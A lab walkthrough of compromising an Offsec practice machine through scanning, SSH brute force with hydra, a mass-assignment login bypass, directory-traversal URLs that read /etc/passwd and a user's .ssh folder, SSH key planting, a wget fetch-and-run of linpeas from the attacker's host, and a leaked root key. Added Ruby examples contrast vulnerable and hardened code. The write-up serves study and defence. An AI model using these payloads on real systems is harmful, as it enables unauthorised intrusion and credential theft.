Summary: This box by Offsec does a great job of showing how specific web enumeration techniques unravel a security misconfiguration in a client-supplied field, which allows authentication bypass and ultimately system compromise.
NMAP
[+] As always, I start with my broad/general scan and then run detailed scans against the open ports. I always use rustscan to verify nmap didn't drop any ports on my initial scan.
nmap -p- -T4 $ip
rustscan -a $ip --ulimit 5000
nmap -A -T4 -p 22,80,33017 $ip -oN nmap.fulltcp


Port Enumeration
[+] Test default/common creds against ssh using hydra.
hydra -C ssh-betterdefaultpasslist.txt ssh://192.168.198.231 -t 4 -v

Unsuccessful.
Web Enumeration
[+] Port 80 always looks promising, but let's first check the output of port 33017, which we saw was open.
curl http://192.168.198.231:33017

Nothing interesting here. If I get stuck, I’ll enumerate this further.
[+] Port 80 drops us right into a login page, which we love to see. However, I want to do some directory busting before moving on to testing for default creds or trying to identify any exploits/misconfigurations that bypass the authentication logic.
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30

[+] It doesn't seem like we can leverage weak credentials on the login page. Checking our gobuster results, we have a register directory. After registering a fake account and using Burp Suite to inspect the request and response between client and server, we identify parameters in the server's response that we can modify to hopefully "trick" the server into bypassing authentication. In the image below, the server's response contains a Boolean field, "confirmed:false". Let's change it to "true" in the request and see what happens.

The original request/response that will be modified.
_method=patch&authenticity_token=Oksow9P0rdRvQYgMcyJ09EUkp-va8TyB213OukKdObu9Ib8WuOTFU1LwP2uJ617hZvM04RcCQcdpBGDNNftngg&user%5Bconfirmed%5D=True&user%5Bemail%5D=PleaseLike%40test.com&commit=Change%20email


Sweet! We’re in.
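The bypass above works because the application copies a client-supplied field (user[confirmed]) onto the account record without checking whether the client is allowed to set it: a classic mass-assignment flaw. The following plain-Ruby example is added here and is not code from the writeup or from the target application; the User class, the field names and the two update methods are hypothetical stand-ins modelled on the PATCH body shown above. It parses a constructed body in that shape and shows the vulnerable update beside the allow-listed form.

```ruby
require 'cgi'

# Hypothetical account model standing in for the target's Rails user record.
class User
  attr_accessor :email
  attr_reader :confirmed

  def initialize(email:, confirmed: false)
    @email = email
    @confirmed = confirmed
  end

  # Type-cast the way a boolean column would: "true"/"True"/"1" become true.
  def confirmed=(value)
    @confirmed = %w[true 1].include?(value.to_s.downcase)
  end

  # VULNERABLE: every key in the request is written straight onto the model,
  # so user[confirmed]=True marks the account confirmed with no verification.
  def update_unsafe(params)
    params.each { |key, value| public_send("#{key}=", value) }
    self
  end

  # HARDENED: only fields the user may change are copied; everything else
  # (confirmed, role, ...) is silently dropped. This mirrors the intent of
  # Rails strong parameters: params.require(:user).permit(:email).
  PERMITTED = %w[email].freeze

  def update_safe(params)
    params.each do |key, value|
      next unless PERMITTED.include?(key.to_s)
      public_send("#{key}=", value)
    end
    self
  end
end

# Turn an application/x-www-form-urlencoded body into a hash of the user[...]
# fields, roughly what the framework hands to the controller.
def parse_user_params(body)
  CGI.parse(body).each_with_object({}) do |(key, values), acc|
    m = key.match(/\Auser\[(\w+)\]\z/)
    acc[m[1]] = values.first if m
  end
end

# Constructed request body with the same fields as the tampered PATCH above
# (the authenticity_token is omitted; it is a CSRF check, not authorization).
TAMPERED_BODY = 'user%5Bconfirmed%5D=True&user%5Bemail%5D=attacker%40test.com&commit=Change%20email'

def confirmed_after_unsafe_update
  user = User.new(email: 'victim@test.com')
  user.update_unsafe(parse_user_params(TAMPERED_BODY)).confirmed
end

def confirmed_after_safe_update
  user = User.new(email: 'victim@test.com')
  user.update_safe(parse_user_params(TAMPERED_BODY)).confirmed
end

def email_after_safe_update
  user = User.new(email: 'victim@test.com')
  user.update_safe(parse_user_params(TAMPERED_BODY)).email
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe update -> confirmed=#{confirmed_after_unsafe_update}"
  puts "safe update   -> confirmed=#{confirmed_after_safe_update}, email=#{email_after_safe_update}"
end
```

The fix is not to hide the field from the form: the client can always add it back, as the Burp-modified request shows. Server-side state such as "confirmed" must only ever be set by the server's own verification flow, and the update path must allow-list the fields a user may change.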
Exploitation
[+] That redirect to the filemanager directory that we picked up from gobuster seems to be where we landed. My inclination is that we should be able to abuse the file upload feature to get RCE somehow. Let's upload a test file and then a webshell.

Nice, so we probably have an unrestricted file upload vulnerability. Let's select our file and identify where the server is storing it. This is crucial so that we can trigger our webshell once it's uploaded.

[+] We see some interesting parameters in the URL path. First, cwd most likely means "current working directory", but it's left blank. Filemanager must be the default or preconfigured base directory, since we know our file was dropped there. The "file" parameter selects the file we specify. Let's try directory traversal by navigating to /etc/passwd, which will list the users on the system.
http://192.168.198.231/?cwd=../../../../../../etc&file=passwd&download=true


Awesome, our downloaded file contains the contents of the /etc/passwd file. We also find a user remi.
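The traversal works because the file manager joins the client-supplied cwd and file values onto its base directory and never checks that the result still lies inside it. The following Ruby example is added here and is not code from the writeup or from the target's file manager; the base directory path and both resolver functions are hypothetical. It shows the naive join beside a containment check, run over the same cwd/file pairs used above.

```ruby
# Hypothetical base directory the file manager serves from.
BASE_DIR = '/var/www/filemanager'

# VULNERABLE: cwd and file are joined straight onto the base, so
# cwd=../../../../../../etc&file=passwd resolves to /etc/passwd.
def resolve_unsafe(cwd, file, base: BASE_DIR)
  File.expand_path(File.join(base, cwd.to_s, file.to_s))
end

# HARDENED: normalise the path, then require it to stay inside the base.
# The trailing separator in the prefix test stops "/var/www/filemanager2"
# from passing as a child of "/var/www/filemanager". expand_path also
# raises ArgumentError on embedded NUL bytes, which is caught below.
def resolve_safe(cwd, file, base: BASE_DIR)
  base_real = File.expand_path(base)
  target = File.expand_path(File.join(base_real, cwd.to_s, file.to_s))
  inside = target == base_real || target.start_with?(base_real + File::SEPARATOR)
  raise ArgumentError, "path escapes #{base}: #{target}" unless inside
  target
end

# Boolean wrapper for a request handler: true when the request may be served.
def path_allowed?(cwd, file, base: BASE_DIR)
  resolve_safe(cwd, file, base: base)
  true
rescue ArgumentError
  false
end

# Constructed requests: the two traversal attempts from above plus two benign ones.
SAMPLE_REQUESTS = [
  { cwd: '',                          file: 'test.txt' },
  { cwd: 'uploads',                   file: 'notes.md' },
  { cwd: '../../../../../../etc',     file: 'passwd' },
  { cwd: '../../../../../../home/remi/', file: '.ssh' },
].freeze

# Returns [cwd, file, unsafe_resolution, allowed?] for each sample request.
def audit_requests(requests = SAMPLE_REQUESTS)
  requests.map do |r|
    [r[:cwd], r[:file], resolve_unsafe(r[:cwd], r[:file]), path_allowed?(r[:cwd], r[:file])]
  end
end

if __FILE__ == $PROGRAM_NAME
  audit_requests.each do |cwd, file, unsafe, ok|
    puts format('%-28s %-9s -> %-28s %s', cwd.inspect, file, unsafe, ok ? 'allowed' : 'BLOCKED')
  end
end
```

Lexical containment is the first line of defence; where the base directory can contain symlinks, resolve the final path with File.realpath as well and re-check the prefix, and run the file manager as a low-privilege account so that even a bypass cannot read other users' home directories.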
[+] Let’s apply the same process again but to traverse to the user remi’s .ssh folder.
http://192.168.198.231/?cwd=../../../../../../home/remi/&file=.ssh&download=true

We have access to the .ssh folder.

[+] There is no "authorized_keys" file. We can generate our own key pair, upload the public key to the .ssh folder as authorized_keys, and then use the private key to gain access.
ssh-keygen -q -N '' -f sshkey
mv sshkey.pub authorized_keys
chmod 600 sshkey
ssh -i sshkey remi@192.168.198.231


Privilege Escalation
[+] Remi does not have any sudo permissions, is not in any special groups, and no SUID binaries showed any promise. The kernel version is not exploitable. It's time to start some automated scans while I work through my manual enumeration methodology on this machine. Linpeas is the first automated scan I like to use, but I need to transfer it to the system first.
# kali
cp /root/transfer/linpeas.sh . # my transfer directory holds binaries I like to drop on every machine I get access to
server 80 # server is my alias for a python http.server to host/transfer files from
# target
which wget # identify which LOLBin for downloading is available on the system
wget http://192.168.45.190/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Linpeas got a hit for a root ssh private key. If we do have access to the root private key, we’ll easily be able to escalate.
[+] Let’s see if we can access the private key in remi’s .ssh directory.

[+] SSH into root with the root private key.
ssh -i root root@127.0.0.1

Pwn3d!